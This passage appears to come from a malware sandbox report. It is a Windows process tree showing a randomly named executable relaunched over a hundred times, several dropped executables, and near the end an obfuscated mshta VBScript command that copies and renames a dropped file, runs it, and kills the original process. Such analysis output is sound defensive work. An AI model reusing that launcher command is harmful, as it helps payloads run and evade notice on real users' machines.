    PID:18944
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:19372
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:18436
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:11452
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:19408
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:16404
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:18892
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:16084
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:11740
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:19724
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:20048
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:20320
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:19688
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:19724
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:20108
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:20392
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:18952
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:20384
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:19468
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:20152
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:20104
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:17432
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:13784
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:20652
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:21156
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:21412
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:20604
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:21148
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:20696
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:19576
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:20676
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:20868
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:18868
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:20920
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:15104
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:11844
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:6060
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:21852
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:22208
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:22392
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:20576
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:22368
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:9336
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:8580
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:22100
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:22052
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:20492
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:19584
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:22684
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:22964
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:23164
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:22048
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:22916
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:23444
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:23524
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:6440
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:22148
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:23100
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:19772
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:23728
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:24060
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:24388
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:23852
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:23292
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:22560
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:22736
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:22792
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:14180
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:24264
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:24124
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:24752
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:24960
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:25160
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:24808
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:24544
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:23132
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:25416
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:25864
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:26496
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:21120
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:23680
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:26564
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:25808
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:26264
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:26552
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:15592
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:21156
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:21384
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:22248
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:23584
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:26952
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:21028
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:25804
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:27488
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:28140
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:28656
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:27784
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:28072
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:26984
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:29000
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:29248
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:29480
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:28776
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:27556
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:29812
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:30380
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:29156
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:29864
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:26220
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:27172
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:30392
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:29824
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:27964
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:30772
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:31400
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:31604
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:30928
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:22000
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:31036
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:6992
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:28328
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:28792
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:32156
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:32432
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:28196
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:32656
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:28200
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:29040
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:27680
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:9528
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:8588
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:32688
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:5148
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:26376
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:29320
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:2828
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:31480
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:30216
- - C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    C:\Users\Admin\Documents\ToWhA1e4ZMLm7LVI4Q19kAnx.exe
    3⤵
    PID:28572
- C:\Users\Admin\Documents\OoP4s0TqtCc8kDGf_f6UxgGS.exe
  "C:\Users\Admin\Documents\OoP4s0TqtCc8kDGf_f6UxgGS.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  PID:2096
- - C:\Program Files (x86)\Company\NewProduct\cutm3.exe
    "C:\Program Files (x86)\Company\NewProduct\cutm3.exe"
    3⤵
    - Executes dropped EXE
    PID:4312
- - C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
    "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
    3⤵
    - Executes dropped EXE
    PID:4380
- - C:\Program Files (x86)\Company\NewProduct\inst1.exe
    "C:\Program Files (x86)\Company\NewProduct\inst1.exe"
    3⤵
    - Executes dropped EXE
    PID:4468
- C:\Users\Admin\Documents\CsvQH9d6ULiQiaCR4F5na_NG.exe
  "C:\Users\Admin\Documents\CsvQH9d6ULiQiaCR4F5na_NG.exe"
  2⤵
  - Executes dropped EXE
  PID:2756
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\System32\mshta.exe" VBSCripT: CloSe ( CReateOBjecT ("wSCRipT.sheLl"). RUN ( "cmD /q /C TYPe ""C:\Users\Admin\Documents\CsvQH9d6ULiQiaCR4F5na_NG.exe"" > Bx0IuOFB.ExE && StArT BX0iUoFB.EXe -PyTJSIPDC12bsxp0f1 & iF """" == """" for %Q in ( ""C:\Users\Admin\Documents\CsvQH9d6ULiQiaCR4F5na_NG.exe"" ) do taskkill -F -im ""%~NxQ"" ", 0, truE) )
    3⤵
    PID:4368
  - - C:\Windows\SysWOW64\cmd.exe
